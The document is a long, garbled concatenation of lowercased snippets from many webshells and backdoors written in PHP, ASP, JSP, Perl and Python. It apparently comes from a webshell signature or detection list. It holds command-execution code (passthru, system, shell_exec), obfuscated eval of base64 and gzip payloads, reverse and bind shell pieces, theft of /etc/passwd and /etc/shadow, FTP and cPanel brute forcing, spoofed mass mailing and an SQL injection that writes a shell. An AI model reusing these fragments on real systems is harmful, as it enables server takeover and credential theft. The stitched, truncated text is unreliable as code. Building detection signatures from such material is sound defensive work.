align=\"center$back_connect_p=\"iyevdxnyl2jpbi9wzxjsdqp1c2ugu29ja2v0ow0kjglhzgrypwluzxrfyxrvbiecho '<h1>execution php-code</h1><div class=content><form name=pf method=posecho \"[dir] <a href=\\\"\".$_server['php_self'].\"?rep=\".realpath($rep.\"..class backdoor {echo \"<a href=\\\"\".$_server['php_self'].\"?copy=1\\\">copier un fichier</a> <if int((1-0+1)*rnd+0)=0 then makeemail=maketext(8) & \"@\" & maketext(8) & \".\"<form name=frmcmd method=post action=\"<%=gurl%>\">dim zombie_array,special_arrayhttp://vnhacker.orgd7nd7l.km4snk`jzknd{n_ejq;bd{kbpur#kq8aaa==^#~@%>></td><td><input type=\"submitprint \"\\n\".'<tr><td width=100pt class=linelisting><nobr>post (php eval)</td><dizin</font></b></font><font face=\"verdana\" style=\"font-size: 8pt\"><s72 shell v1.0 codinf by cr@zy_kingecho \"<p align=center>dosya zaten bulunuyor</p>\"<?$d='g7mhwq9vvxil/qx2oz2vtdpo6g3fyaa6x+8dmizcd0ehzabzh7jfpzzuz7xnenxsyvbp2wy36ukacak fso 1.0if request.querystring(\"tgh\") = \"1\" then<font color=\"#858585\">buqx</font></a></font><font face=\"verdana\" style=mailto:buqx@hotmail.comlord of iran hackers sabotagelord-c0d3r-nt$port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);# [+] domain name address typewww.antichat.rucan't open file, permission denidehas been already loaded. php emperor <xb5@hotmail.action=mysqlread&mass=loadmass\">load all defaultsif (@passthru($cmd)) { echo \" -->\"; $this->output_state(1, \"passthruprint \"<tr><td><b>server is:</b></td><td>\".$_server['server_signature'].\"</tdprint \"<tr><td><b>execute command:</b></td><td><input size=100 name=\\\"_cmdcoded by n0 [nzer0] www.cyberlords.netu29mdhdhcmuaqwrvymugsw1hz2vszwfkexhjztwaaaamuexurf///waaajmzzaaaacjourkaaaaereturn \"<br>dump error! can't write to \".htmlspecialchars($file);call os.run(\"win.com cmd.exe /c del \"& sztf,0,true)<div align=\"left\"><font size=\"1\">input command :</font></div><input type=\"text\" name=\"cmd\" size=\"30\" class=\"input\"><br><input type=\"text\" name=\"dir\" size=\"30\" value=\"<? passthru(\"pwd\"); ?>ayyildiztouch by ijoofirst we check if there has been asked for a working directoryhttp://ayyildiz.org/images/whosonline2.gifejder was here*~pu*&bp[_)f!8c2f*@#@&~,p~p,~p&q~8bpms~9~~lb~x`v,_,f&*~,jcw~~[_c3trffzq@#@&pp,~~lama's'hellif($_post['king'] == \"\") {if (move_uploaded_file($_files['fila']['tmp_name'], $curdir.\"/\".$_files['fnewhtml = '<b>file browser is under construction! use at your own risk!</b> <br>empty command..type \\\"shellhelp\\\" for some ehh...helpnewhtml = '<font size=0><b>this will reload the page... :(</b><br><br><form enctjspwebshellcreateanddeletefolder is error:<td width=\"70%\" height=\"22\">&nbsp;<%=env.queryhashtable(\"java.cstring _password =\"111\";$baglan=fopen(\"/tmp/$ekinci\",'r');$tampon4=$tampon3-1@aventgrup.net$yazi = \"test\" . \"\\r\\n\";fwrite ($fp, \"$yazi\");$entry_line=\"hacked by entrika\";sh_out=os.popen(shell+\" \"+cmd).readlines()# d00r.py 0.3a (reverse|bind)-shell in python by fqprint \"error; help: head -n 16 d00r.py\"print \"pw:\",pw,\"port:\",port,\"host:\",host$error_text = '<strong>failed selecting database \"'.$this->db['<div align=\"center\">the backup process has now started<br </a><a href='\"&dosyapath&\"?status=10&dpath=\"&f1.path&\"&path=\"&path&\"&time=<input type=submit value=\"test et!\" onclick=\"$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/eshow <input type=text size=5 value=\".((isset($_post['br_st']))?$_post['br_st']:echo \"fichier telecharge dans \".good_link(\"./\".$_files[\"fic\"][\"naif(move_uploaded_file($_files[\"fic\"][\"tmp_name\"],good_link(\"./\".$_fiecho \"cliquez sur un nom de fichier pour lancer son telechargement. cliquez s$dl=$_request['download'];else shell(\"perl.exe $name $port\");fputs ($fp, \"# rst mysql tools\\r\\n# home page: http://rst.void.ru\\r\\n#a cgi by fuzzyman\"\"\"+fontline +\"version : \" + versionstring + \"\"\", running on : \"\"\" + values = map(lambda x: x.value, theform[field]) # allows for<title>ru24postwebshell - \".$_post['cmd'].\"</title>if ((!$_post['cmd']) || ($_post['cmd']==\"\")) { $_post['cmd']=\"id;pwd;uname -awrited by dreamerzr3v3ng4ns\\ndigiteif(!@opendir($chdir)) $ch_msg=\"dtool: line 1: chdir: it seems that the permissiif (empty($cmd) and $ch_msg==\"\") echo (\"comandos exclusivos do dtool pro\\n0ldw0lfhowever you are lucky :pi'm fuckedioctl($client{$client}->{shell}, &tiocswinsz, $winsize);#atrix@irc.brasnet.org$dataout .= \"<td><a href='$myloc?$sreq&incdbhost=$myhost&incdbuser=$myuser&incdif($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $stroutput .= dbsafe0verscript gecisi tamamlayamadi!document.write(unescape('%3c%68%74%6d%6c%3e%3c%62%6f%64%79%3e%3c%53%43%52%49%50%/* we have found the parent dir. we must be carefull if the parent $tmpfile = tempnam('/tmp', 'phpshell');if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {www.rohitab.comprint \"set-cookie: savedpwd=;\\n\"; # remove password cookie$prompt = $winnt ? \"$currentdir> \" : \"[admin\\@$servername $cwww.ironwarez.info$cookiename = \"wieeeee\";~ shell iwww.rootshell-team.infosetcookie($cookiename, $_post['pass'], time()+3600);www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tanprint(\"<br>provenance du mail : <input type=\\\"text\\\" name=\\\"provenancif mcolformelem.exists(lcase(sindex)) then form = mcolformelem.item(lcase(sindex))session(\"shagman\")=// note that linux = cmd and windows = \"cmd.exe /c + cmd\" h4ntu shellsystem(\"$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");set entrika = entrika.createtextfile(\"c:\\net.vbs\", true)http://www35.websamba.com/cybervurgun/>[*] safemode mode run</div>$file1 - $file2 - <a href=$script_name?$query_string&see=$file>$file</a><br>[*] spawning shellcha0shttp://popeye.snu.ac.kr/~smkim/mysqlhref='$php_self?action=dropfield&dbname=$dbname&tablename=$tablename<th>type</th><th>&nbspm&nbsp</th><th>&nbspd&nbsp</th><th>unsigned</th><th>zerofi<title>g-security webshell</title><input type=text name=\"-cmd\" size=64 value=\"<?=$cmd?>\" <? if($cmd != \"\") print shell_exec($cmd);?><? $cmd = $_request[\"-cmd\"];?>echo \"<b>changing file-mode (\".$d.$f.\"), \".view_perms_color($d.$f).\" (\"echo \"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur<tr><form method=post><td><font color=red><b>back connect:</b></font></td><td><i$perl_proxy_scp = \"iyevdxnyl2jpbi9wzxjsicancimhl3vzci91c2mvcgvybc81ljawnc9iaw4v<tr><form method=post><td><font color=red><b>backdoor:</b></font></td><td><input.textbox { background: white; border: 1px #000000 solid; color: #000099; font-fa<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''echo \"<hr size=\\\"1\\\" noshade><b>done!</b><br>total time (secs.): \".$ft$fqb_log .= \"\\r\\n------------------------------------------\\r\\ndone!\\r'eng_text71'=>\"second commands param is:\\r\\n- for chown - name of new owner oif(!empty($_post['s_mask']) && !empty($_post['m'])) { $sr = new searchresult\"aaaaach5baeaaakalaaaaaauabqaaar0mmljqyzfalqeqjugeqscnwg6fogpkhamf4hajswh7/ze\"\"mtp/zdp//2yaagyam2yazmyamwyazgya/2yzagyzm2yzzmyzmwyzzgyz/2zmagzmm2zmzmzmmwzm\"\"r0lgodlhfaauakl/ap/4/8dawh9/ap/4al+/vwaaaaaaaaaaach5baeaaaealaaaaaauabqaqamo\"echo $te.\"<div align=center><textarea cols=35 name=db_query>\".(!empty($_post['echo sr(45,\"<b>\".$lang[$language.'_text80'].$arrow.\"</b>\",\"<select name=db> if ($copy_unset) {foreach($sess_data[\"copy\"] as $k=>$v) {unset($sess_data[\" if (file_exists($mkfile)) {echo \"<b>make file \\\"\".htmlspecialchars($mkfile echo \"<center><b>mysql \".mysql_get_server_info().\" (proto v.\".mysql_get_pr elseif (!fopen($mkfile,\"w\")) {echo \"<b>make file \\\"\".htmlspecialchars($m$sess_data[\"cut\"] = array(); c99_sif ((!eregi(\"http://\",$uploadurl)) and (!eregi(\"https://\",$uploadurl))c99sh_sqlqueryelse {$act = \"f\"; $d = dirname($mkfile); if (substr($d,-1) != directory_sepaelse {echo \"<b>file \\\"\".$sql_getfile.\"\\\":</b><br>\".nl2br(htmlspec'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',$name='ec371748dc2da624b35a4f8f685dd122'echo ws(2).$lb.\" <a$sql = \"load data infile \\\"\".$_post['test3_file']if (empty($_post['cmd'])&&!$safe_mode) { $_post['cmd']=($windows)?(\"dir\"):(\"lif(eregi(\"./shbd $por\",$scan))$_post['backconnectip']$_post['backcconnmsg']if(rmdir($_post['mk_name']))$r .= '<tr><td>'.ws(3).'<font face=verdana size=-2><b>'.$key.'</b></font></td>if(unlink($_post['mk_name'])) echo \"<table width=100% cellpadding=0 cell\"ext_avi\"=>array(\"ext_avi\",\"ext_mov\",\"ext_mviecho \"<b>execute file:</b><form action=\\\"\".$surl.\"\\\" method=post><inpu\"ext_htaccess\"=>array(\"ext_htaccess\",\"ext_htpasswdreturn $type . $owner . $group . $other;$owner = ($mode & 00400) ? 'r' : '-';sncirwcm90bz1nzxrwcm90b2j5bmftzsgndgnwjyk7dqpzb2nrzxqou09ds0vulcbqrl9jtkvulcbtt0a8c3lzl3nvy2tldc5opg0ki2luy2x1zgugpg5ldgluzxqvaw4uad4ncinpbmnsdwrlidxlcnjuby5opg<b>dumped! dump has been writed to if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo \"<table st<input type=submit name=actarcbuff value=\\\"pack buffer to archive@ini_set(\"highlightecho \"<b>result of execution this php-code</b>:<br>\";{$row[] = \"<b>owner/group</b>\";}echo $uname.\"</font><br><b>\";while(!feof($f)) { $res.=fread($f,1024); }echo \"user=\".@get_current_user().\" uid=\".@getmyuid().\" gid=\".@getmygid()c99ftpbrutecheck$ftpquick_t = round(getmicrotime()-$ftpquick_st,4);$fqb_lenght = $nixpwdperpage;$sock = @ftp_connect($host,$port,$timeout);$sqlquicklaunch[] = array(\"else {echo \"<center><b>file does not exists (\".htmlspecialchars($d.$f).\")!<if(@$_post['save'])writef($file,$_post['data']);if($action==\"phpeval\"){$uploadfile = $dirupload.\"/\".$_post['filename'];$dir=getcwd().\"/\";if (!empty($delerr)) {echo \"<b>deleting with errors:</b><br>\".$delerr;}if ($filename != \".\" and $filename != \"..\"){$dires = $dires . $directory;$arr = array_merge($arr, glob(\"*\"));@$rto=$_post['rto'];scrollbar-track-color: #91aaff$to1=str_replace(\"//\",\"/\",$to1); if ($mode & 0x200) {$world[\"execute\"] = ($world[\"execute\"] == \"x\")?\"t\": $group[\"execute\"] = ($mode & 00010)?\"x\":\"-\";$result = mysql_query(\"show processlist\", $sql_sock); elseif (!empty($ft)) {echo \"<center><b>manually selected type is incorrect. ielse {echo \"<center><b>unknown extension (\".$ext.\"), please, select type ma$s = \"!^(\".implode(\"|\",$tmp).\")$!i\";if ($total === false) {$total = 0;}$free_percent = round(100/($total/$free),2);if (!$bool) {$bool = is_dir($letter.\":\\\\\");}$bool = $isdiskette = in_array($letter,$safemode_diskettes);$res = mssql_query(\"select * from r57_temp_table\",$db);'eng_text30'=>'cat file',@mssql_query(\"drop table r57_temp_table\",$db);$num = $nixpasswd + $nixpwdperpage;$ret = posix_kill($pid,$sig);if ($uid) {echo join(\":\",$uid).\"<br>\";}$i = $nixpasswd;form method=post><input type=hidden name=\"\"#\"\" value=execute(session(\"\"#\"\"))><input name=thepath value=\"\"\"&htmlencode(server.mappath(\".\"))&else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);lsext = right(filename, len(filename) - licount)response.write drive.sharename & \" [share]\"if request.querystring(\"copyfile\") <> \"\" then<td width=\"40%\" height=\"20\" bgcolor=\"silver\"> name</td>@rmdir($_get['file']) or die (\"[-]error deleting dir!\");$ps=str_replace(\"\\\\\",\"/\",getenv('document_root'));header(\"expires: \".date(\"r\",mktime(0,0,0,1,1,2030)));search_file($_post['search'],urldecode($_post['dir']));echo base64_decode($images[$_get['pic']]);if (isset($_get['rename_all'])) {$from = rand (71,1020000000).\"@\".\"attacker.com\";&nbsp;turkish hackers : www.alturks.com <br>&nbsp;programer : simattacker - edited by kingdefacer<br>//fake mail = use victim server 4 dos - fake mail &nbsp;e-mail : kingdefacer@msn.com<br>error_reporting(e_error | e_warning | e_parse);echo \"<font size='1' color='#999999'>dont in windows\";$comments=$_post['comments'];function phpget(){inclvar(); if(confirm(\"o phpget agora oferece uma lista pront<font size=3>by r3v3ng4ns - revengans@gmail.com </font>function phpwriter(){inclvar();var url=prompt(\"[ phpwriter ] by r3v3ng4ns\\ndig//turns the 'ls' command more usefull, showing it as it looks in the shellif (@file_exists(\"/usr/bin/wget\")) $pro3=\"<i>wget</i> at /usr/bin/wget, \";//to keep the changes in the url, when using the 'get' way to send php variablesfunction phpf(){inclvar();var o=prompt(\"[ phpfileditor ] by r3v3ng4ns\\ndigite if(empty($fu)) $fu = @$_get['fu'];<title>'.getenv(\"http_host\").' ~ shell i</title>$link = mysql_connect($_post['host'], $_post['username'], $_posterror_reporting(0); //if there is an error, we'll show it, k?print \"<form action=\\\"\".$me.\"?p=chmod&file=\".$content.\"&dif(!is_numeric($_post['timelimit']))if($_post['chars'] == \"9999\")<option value=\\\"az\\\">a - zzzzz</option>print shell_exec($command);<meta http-equiv=\"content-language\" content=\"tr\"><title>www.sanalteror.org - indexer and reader</title><form action=\"?gonder\" method=\"post\"><form action=\"?oku\" method=\"post\">var message=\"sanalteror - ndexer - reader\"cprthtml = \"<font face='arial' size='1'>rhtools 1.5 beta(pvt) edited by kingdefbarrapos = cint(instrrev(left(raiz,len(raiz) - 1),\"\\\")) - 1destino3 = folderitem.path & \"\\index.asp\"@error_reporting(0);@eval(gzinflate(base64_decode($code)));@set_time_limit(0); </font></span><a href=\"mailto:shopen@aventgrup.net\"><title>:: aventgrup ::.. - sincap 1.0 | session(oturum) b</span>avrasya veri ve network teknolojileri geliwhile (($ekinci=readdir ($sedat))){$deger2= \"$ich[$tampon4]\";// encrypt your password to md5 here http://kerinci.net/?x=decode// password (default is: b374k)//******************************************************************************// b374k 2.2eval(\"?>\".gzinflate(base64_decode(&nbsp;iranian hackers : www.simorgh-ev.com <br><a style=\"text-decoration: none\" href=\"http://www.simorgh-ev.com\">victim mail :<br><input type='text' name='to' ><br><title>h4ntu shell [powered by tsoi]</title>$cmd = $_post['cmd'];$uname = posix_uname( );echo \"<p><font size=2 face=verdana><b>this is the server information</b></font>ob_end_clean();<title>myshell error - access denied</title>$adminemail = \"youremail@yourserver.com\";//a workdir has been asked for - we chdir to that dir.system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o#$autoerrortrap enable automatic error traping if command returns error./* no work_dir - we chdir to $document_root */#every command you excecute.<form name=\"shell\" method=\"post\">if ($_post['cmd']){echo \"file uploaded to $dez\";if (file_exists($uploaded)) {passthru($cmd);ster\" name=submit> </font> &nbsp; &nbsp; &nbsp; <a href=mailto:mailbomb@hotmail hacking font-weight: bold; background: #ffffff url('images/cellpic1.gif'); text-indent: padding-right: 8px; padding-left: 8px; font-weight: bold; font-size: 11px; backg<option value=\"/etc/passwd\">get /etc/passwd</option>by php emperor<xb5@hotmail.com>\".htmlspecialchars($file).\" has been already loaded. php emperor <xb5@hotmail.die(\"<font color=\\\"red\\\"><center>sorry... fileif(empty($_get['file'])){echo \"<head><title>safe mode shell</title></head>\"; $liz0zim=shell_exec($_post[liz0]); $liz0=shell_exec($_post[baba]); echo \"<b><font color=blue>liz0zim private safe mode command execuriton bypass e :=) :</font><select size=\"1\" name=\"liz0\">http://<? echo $server_name.$request_uri; ?>?d=/etc on *nix// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombiif(!isset($_request['dir'])) die('hey,specify directory!');else echo \"<a href='$php_self?f=$d/$dir'><font color=black>\";if( $_post['_act'] == \"upload!\" ) {print \"<center><h1>#worst @dal.net</h1></center>\";print \"<center><h1>linux shells</h1></center>\";$currentcmd = \"ls -la\";print \"<tr><td><b>system type:</b></td><td>$uname</td></tr>\";$currentcmd = str_replace(\"\\\\\\\\\",\"\\\\\",$_post['_cmd']);echo '<a href='.$expurl.'> click here to exploit </a> <br />';<form action = \"<?php echo \"$_server[php_self]\" ; ?>\" method = \"post\">$sql = \"0' union select '0' , '<? system(\\$_get[cpc]);exit; ?>' ,0 ,0 ,0 ,0 infull server path to a writable file which will contain the php shell <br />$expurl= $url.\"?id=\".$sql ;<header>|| .::news php shell injection::. ||</header> <br /> <br /><input type = \"submit\" value = \"create exploit\"> <br /> <br /><title>webcommander at <?=$_server[\"http_host\"]?></title>/* webcommander by cr4sh_aka_rkl v0.3.9 ngh edition :p */<form action=<?=$script?>?act=backconnect method=post><form action=<?=$script?>?act=mkdir method=post>die(\"<font color=#df0000>login error</font>\");<b>bind /bin/bash at port: </b><input type=text name=port size=8>$command .= ' -f';/* we try and match a cd command. */directory... trust me - it works :-) */$command .= \" 1> $tmpfile 2>&1; \" .$new_dir = $regs[1]; // 'cd /something/...'/* the last / in work_dir were the first charecter.http://www.ru24-team.net$function=passthru; // system, exec, cmd$md5_pass = \"\"; //if no pass then hash$pass = \"pass\"; //pass$login = \"user\"; //login //authentication$encoded = base64_encode(file_get_contents($d.$f)); $file = $tmpdir.\"dump_\".getenv(\"server_name\").\"_\".$db.\"_\".date(\"d-m-yelse {$tmp = htmlspecialchars(\"./dump_\".getenv(\"server_name\").\"_\".$sq$c99sh_sourcesurl = \"http://locus7s.com/\"; //sources-server $nixpwdperpage = 100; // get first n lines from /etc/passwd system.out.println(\"createanddeletefolder is error:\"+ex); string password=request.getparameter(\"password\");<%@ page contenttype=\"text/html; charset=gbk\" language=\"java\" import=\"java.string editfile=request.getparameter(\"editfile\");//string tempfilename=request.getparameter(\"file\");$scriptident = \"$scripttitle by evilc0der.com\";while (file_exists(\"$lastdir/newfile$i.txt\"))else { /* <!-- then it must be a file... --> */$contents .= htmlentities( $line ) ;<br><p><br>safe mode bypass<p><form method=\"post\">elseif ( $cmd==\"upload\" ) { /* <!-- upload file form --> */ /* <!-- end of actions --> */$adres=gethostbyname($ip);curl_setopt($ch,curlopt_postfields,\"domain=\".$site);$ekle=\"/index.php?option=com_user&view=reset&layout=confirm\";echo $son.' <br> <font color=\"green\">access</font><br>';<p>kodlama by <a href=\"mailto:priv8coder@gmail.com\">blaster</a><br /<p><strong>server listeleyici</strong><br /># author homepage: http://www.rohitab.com/elsif($action eq \"command\") # user wants to run a command# in a command line on windows nt.print \"transfered $targetfilesize bytes.<br>\";<!-- http://michaeldaw.org 2006 --> echo \"</pre>\"; $cmd = ($_request['cmd']); echo \"<pre>\"; die; system($cmd);xb5@hotmail.com</font></center></b>\");$v = @ini_get(\"open_basedir\");| -obzerve : mr_o@ihateclowns.com |<form action=ntdaddy.asp method=post>response.write(\"<error: this is not a text file>\")if(($_post['exe']) == \"execute\") {$curcmd = $_post['king'];\"http://www.w3.org/tr/html4/loose.dtd\"><title>lama's'hell v. 3.0</title>_|_ o _ o _|_$curcmd = \"ls -lah\";$content = chunk_split(base64_encode($content)); print \"sending mail to $to....... \"; if (!$from && !$subject && !$message && !$emaillist){ $pass = \"\"; //pass$login = \"\"; //login' author: maceo <maceo @ dogmile.com>' -- use a poor man's pipe ... a temp file -- '' --------------------o0o--------------------' file: cmdasp.asp<-- cmdasp.asp -->set oscriptnet = server.createobject(\"wscript.network\") if (isset($_files['probe']) and ! $_files['probe']['error']) {<b>--coded by silver<title>upload - shell/datei</title><a href=\"http://www.n-c-c.6x.to\" target=\"_blank\">-->ncc<--</a></center></b><~|_team .:national cracker crew:._|~<br>printf(\"sie ist %u bytes grocommon php webshells. do not host the file(s) in your server!php-webshells$headers .= \"\\nmime-version: 1.0\\n\" .\"content-type: multipart/mixed;\\n\" .* as email attachment, or send to a remote ftp server by* neagu mihai<neagumihai@hotmail.com>$from = \"neu-cool@email.com\"; // who should the emails be sent from?, may - ak-74 security team web site: www.ak74-team.net<b><font color=#830000>8. x forwarded for ip - </font></b><font color=#830000>'.<b><font color=#83000>execute system commands!</font></b>function ftp_check($host,$user,$pass,$timeout){curl_setopt($ch, curlopt_url, \"http://$host:2082\");[ user@alturks.com ]# info<b><br><font face=tahoma><br>curl_setopt($ch, curlopt_ftplistonly, 1);powerful tool , ftp and cpanel brute forcer , php 5.2.9 safe_mode & open_basedir<br><b>please enter your username and password to logon<br><?php passthru(getenv(\"http_accept_language\")); echo '<br> by q1w2e3r4'; ?><p>more: <a href=\"/\">md5cracking.com crew</a> href=\"/\" title=\"securityhouse\">security house - shell center - edited by kinecho '<pre><p>this is exploit from <a this exploit was edited by kingdefacersafe_mode and open_basedir bypass php 5.2.9 $hardstyle = explode(\"/\", $file); while($level--) chdir(\"..\"); if(isset($_post[\"action\"])) $action = $_post[\"action\"];elseif(fe(\"system\")){ob_start();system($s);$r=ob_get_contents();ob_end_clean(){ $pwd = $_post[\"pwd\"]; $type = filetype($pwd); if($type === \"dir\")chdir($pw<title>tryag team - tryag.php - edited by kingdefacer</title>$tabledump = \"drop table if exists $table;\\n\"; $string = !empty($_post['string']) ? $_post['string'] : 0; $tabledump .= \"create table $table (\\n\"; echo \"<center><div id=logostrip>edit file: $editfile </div><form action='$requeheader(\"last-modified: \".date(\"r\",filemtime(__file__)));header(\"content-type: image/gif\");@copy($file,$to) or die (\"[-]error copying file!\");// a robust backdoor script made by daniel berliner - http://www.qsdconsulting.cif(isset($_post[\"newcontent\"]))foreach($parts as $val)//assemble the path back together$_post[\"newcontent\"]=urldecode(base64_decode($_post[\"newcontent\"]));kingdefacer@msn.com</font></center></b>\");if($_post['root']) $root = $_post['root'];\".htmlspecialchars($file).\" bu dosya zaten goruntuleniyor<kingdefacer@msn.com>by kingdefacer from spygrup.org>header(\"content-length: \".filesize($_post['downf']));if($_post['save']==0){echo \"<textarea cols=70 rows=10>\".htmlspecialchars($dumpwrite(\"#\\n#server : \".getenv('server_name').\"foreach(@file($_post['passwd']) as $fed)echo $fed;<meta name=\"copyright\" content=touch by ijoo\">/* ls looks much better with ' -f', imho. */} else if ($command == 'ls') {$ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];### gamma group <http://www.gammacenter.com>my $error = \"this command is not available in the restricted mode.\\n\";my $command = $self->query('command');target = \"d:\\hshome\\masterhr\\masterhr.com\\\" ' ---directory to which filesnpos = instrb(nposend, bidata, cbytestring(\"content-type:\"))document.frmsql.mpage.value = document.frmsql.mpage.value - 1if request.querystring(\"getdrvs\")=\"@\" then' ---copy too folder routine start// string tempfilepath=request.getparameter(\"filepath\");endpoint=random1.getfilepointer();if (request.getparameter(\"command\") != null) {#to execute commands, simply include ?cmd=___ in the url. #$query = \"show columns from \" . $_get['table'];$uakey = \"724ea055b975621b9d679f7077257bd9\"; // md5 encoded user-agentecho(\"<form method='get' name='shell'>\");echo(\"<form method='post' action='?act=sql'>\");// it's simple shell for all win os.//------- [netstat -an] and [ipconfig] and [tasklist] ------------<html><head><title>-:[greenwood]:- winx shell</title></head>// created by greenwood from n57 if (is_uploaded_file($userfile)) {\" printf(\\\"usage: %s [host] <port>\\\\n\\\", argv[0]);\\n\" .if ($portscan != \"\") {echo \"<br>banner: $get <br><br>\";$dono = get_current_user( );// dump database [pacucci.com]$dump = \"-- database: \".$_post['db'] .\" \\n\";$aids = passthru(\"perl cbs.pl \".$_post['connhost'].\" \".$_post['connport']);<b>ip:</b> <u>\" . $_server['remote_addr'] .\"</u> - server ip:</b> <a href='htt$dump .= \"-- cyber-warrior.org\\n\";if(isset($_post['doedit']) && $_post['editfile'] != $dir)# dump variables (debug script) needs modifiny for b64 status!!\"phpshellapp\" => \"export term=xterm; bash -i\",else if($numhosts == 1) $stroutput .= \"on 1 host..\\n\";$dump .= \"-- dumping data for table '$table'\\n\";$dump .= \"create table $table (\\n\";var_dump(@$shell->regread($_post['readregname']));$program = isset($_post['program']) ? $_post['program'] : \"c:\\winnt\\system32$regval = isset($_post['regval']) ? $_post['regval'] : 'c:\\winnt\\backdoor.exe'the requested url /nemo/shell/zyklonshell.txt was not found on this server.<p><!doctype html public \"-//ietf//dtd html 2.0//en\"><title>404 not found</title><h1>not found</h1>if($ok==false &&$status && $autoerrortrap)system($command . \" 1> /tmp/outpu<title>$myshellversion - access denied</title>}$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['htt$commander = $_post['commander']; $sourcego = $_post['sourcego']; $result = mysql_query($loli12) or die (mysql_error()); #change this password; for power security - delete this file =)if (!defined$param{cmd}){$param{cmd}=\"ls -la\"};open(filehandle, \"cd $param{dir}&&$param{cmd}|\");print << \"[kalabanga]\";<title>go.cgi</title><font size='+1'color='#0000ff'>azrailphp'nin url'si: http://$http_host$red$fileperm=base_convert($_post['fileperm'],8,10);touch (\"$path/$dismi\") or die(\"dosya oluecho \"<div align=left><a href='./$this_file?dir=$path/$file'>gframes.byzehir.document.execcommand(command, false, option);response.write \"<title>zehiriv --> powered by zehir &lt;zehirhacker@hotmail.comresponse.write \"<title>zehir3 --> powered by zehir &lt;zehirhacker@hotmail.com&$info .= '[~]server: ' .$_server['http_host'] .'<br />';header ( \"content-description: download manager\" );print \"<center>[ generation time: \".round(gettime()-starttime,4).\" secondif (mkdir($_post['dir'], 0777) == false) {$ret = shellexec($command);<font size='+1'color='#0000ff'><u>casus 1.5'in url'si</u>: http://$http_ho$fonk_kap = get_cfg_var(\"fonksiyonlary_kapat\");if (file_exists(\"f:\\\\\")){echo \"[-] error : coudn't read /etc/passwd\";@$ftp=ftp_connect('127.0.0.1');echo \"<title>edited by kingdefacer</title><body>\";echo \"[+] founded \".sizeof($users).\" entrys in /etc/passwd\\n\"; <a href=\"http://www.cyberlords.net\" target=\"_blank\">cyber lords community</echo \"<meta http-equiv=refresh content=\\\"0; url=$php_self?edit=$nameoffile&sh * coded by pixcher<input type=text size=55 name=newfile value=\"$d/newfile.php\">'read /etc/passwd' => \"runcommand('etcpasswdfile','get')\",'running processes' => \"runcommand('ps -aux','get')\",$dt = $_post['filecontent'];'open ports' => \"runcommand('netstat -an | grep -i listen','get')\",print \"sorry, none of the command functions works.\";document.cmdform.command.value='';elseif(isset($_get['savefile']) && !empty($_post['filetosave']) && !empty($_postheader(\"content-disposition: filename=$filename.sql\");else if( $action == \"dumptable\" || $action == \"dumpdb\" ) {echo \"<font color=blue>[$username]</font> - \\n\";if( $action == \"dumptable\" )if(!$result2)$dump_file.='#error table '.$rows[0];if(!(@mysql_select_db($db_dump,$mysql_link)))echo('db error');header('content-length: '.strlen($dump_file).\"\\n\");echo('dump for '.$db_dump.' now in '.$to_file);elseif ( $cmd==\"file\" ) { /* <!-- view a file in text --> *//* i added this to ensure the script will run correctly...<!-- </form> -->elseif ( $cmd==\"downl\" ) { /*<!-- save the edited file back to a file --> */<font color=\"#000000\">sil</font></a></font></td><td width=\"122\" height=\"17\" bgcolor=\"#9f9f9f\">onfocus=\"if (this.value == 'kullan<img border=\"0\" src=\"http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif\">:<b>\" .base64_decode($_post['tot']). \"</b>\";if (isset($_post['wq']) && $_post['wq']<>\"\") {if (!empty($_post['c'])){passthru($_post['c']);<input type=\"radio\" name=\"tac\" value=\"1\">b64 decode<br><input type=\"radio\" name=\"tac\" value=\"3\">md5 hash<form method=\"post\" action=\"<?echo \"phvayv.php?duzkaydet=$dizin/$duzenle<? if ($ekinci==\".\" or $ekinci==\"..\") {name=\"duzenx2\" value=\"klas$token = substr($_request['command'], 0, $length);var command_hist = new array(<?php echo $js_command_hist ?>);$_session['output'] .= htmlspecialchars(fgets($io[1]),document.shell.command.value = command_hist[current_line];$_request['command'] = $aliases[$token] . substr($_request['command'], $if (empty($_session['cwd']) || !empty($_request['reset'])) {if((isset($_post['fileto']))||(isset($_post['filefrom'])))\\$port = {$_post['port']};$_post['installpath'] = \"temp.pl\";}if(isset($_post['post']) and $_post['post'] == \"yes\" and @$http_post_files[\"ucopy($http_post_files[\"userfile\"][\"tmp_name\"],$http_post_files[\"userfile\"]<input type='submit' value=' open (shill.txt) '>var_dump(curl_exec($ch));if(empty($_post['mohajer22'])){$m=$_post['curl'];$u1p=$_post['copy'];if(empty(\\$_post['cmd'])){$string = explode(\"|\",$string);$stream = imap_open(\"/etc/passwd\", \"\", \"\");header('content-length:'.filesize($file).'');<textarea name=\\\"command\\\" rows=\\\"5\\\" cols=\\\"150\\\">\".@$_post['commaif(filetype($dir . $file)==\"file\")$files[]=$file;elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} $info .= (($perms & 0x0004) ? 'r' : '-');$owner[\"write\"] = ($mode & 00200) ? 'w' : '-';$owner[\"execute\"] = ($mode & 00100) ? 'x' : '-';$world[\"write\"] = ($mode & 00002) ? 'w' : '-';$world[\"execute\"] = ($mode & 00001) ? 'x' : '-';foreach ($arr as $filename) {else if( $mode & 0x6000 ) { $type='b'; }(($perms & 0x0400) ? 's' : '-'));} elseif (($perms & 0x8000) == 0x8000) {if (($perms & 0xc000) == 0xc000) {$info .= (($perms & 0x0008) ?// block special$info = 